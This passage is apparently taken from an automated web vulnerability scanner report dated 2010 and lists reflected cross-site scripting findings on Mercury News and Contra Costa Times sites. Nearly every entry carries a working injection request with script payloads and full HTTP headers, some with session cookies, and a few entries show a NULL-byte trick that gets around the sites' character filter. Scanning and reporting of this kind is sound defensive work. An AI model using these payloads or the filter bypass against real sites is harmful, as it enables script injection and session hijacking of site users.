GET /restaurants?33257"><script>alert(1)</script>16f8b094cda=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/restaurants?33257"><script>alert(1)</script>16f8b094cda=1" /> ...[SNIP]...
3.45. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305e4"><script>alert(1)</script>1a2aba766b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?305e4"><script>alert(1)</script>1a2aba766b3=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 86612<script>alert(1)</script>28ae8f0c402 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.47. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.contracostatimes.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4adba"-alert(1)-"e41b940e332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4adba"-alert(1)-"e41b940e332=1 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:51 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54682
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41bf8"-alert(1)-"353834f6171 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll41bf8"-alert(1)-"353834f6171/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:05:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:05:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22843
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1011"-alert(1)-"87110bc119c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11d1011"-alert(1)-"87110bc119c HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:31 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:05:55 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20640
3.50. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ee8e"-alert(1)-"47271c9d198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11?8ee8e"-alert(1)-"47271c9d198=1 HTTP/1.1 Host: forums.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:05:21 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:05:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20430
3.51. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58"-alert(1)-"da78a3fd75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?91e58"-alert(1)-"da78a3fd75c=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:11:57 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=6ec373c57579c10d331d00c8ebed1d1d; expires=Wed, 08 Dec 2010 02:45:17 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:21 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 50878
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45812"-alert(1)-"613868a3771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum45812"-alert(1)-"613868a3771/576 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22096
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79cf3"-alert(1)-"89396556484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/57679cf3"-alert(1)-"89396556484 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16253
3.54. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/576
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4beb6"-alert(1)-"9c54b14f479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/576?4beb6"-alert(1)-"9c54b14f479=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20988
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6416f"-alert(1)-"3bf608c035c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:23 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:47 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22156
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67461"-alert(1)-"eb6ddd1910a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:32 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16333
3.57. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/business-technology-business-news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931e2"-alert(1)-"60a68e53a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:10 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:34 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20988
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ec4"-alert(1)-"16924a4f316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumf7ec4"-alert(1)-"16924a4f316/news HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:38 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22098
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54941"-alert(1)-"d801b306391 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news54941"-alert(1)-"d801b306391 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:44 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:08 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16072
3.60. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9da1"-alert(1)-"992e5590b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news?c9da1"-alert(1)-"992e5590b97=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:24 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19272
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef319"-alert(1)-"7ea175d2fc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsef319"-alert(1)-"7ea175d2fc0/forum/602 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:21 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22112
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ef166"-alert(1)-"5348053c353 was submitted in the REST URL parameter 2. This input was echoed as ef166"-alert(1)-"5348053c353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%00ef166"-alert(1)-"5348053c353/602 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087dba"-alert(1)-"bd7fc6dfef5 was submitted in the REST URL parameter 3. This input was echoed as 87dba"-alert(1)-"bd7fc6dfef5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
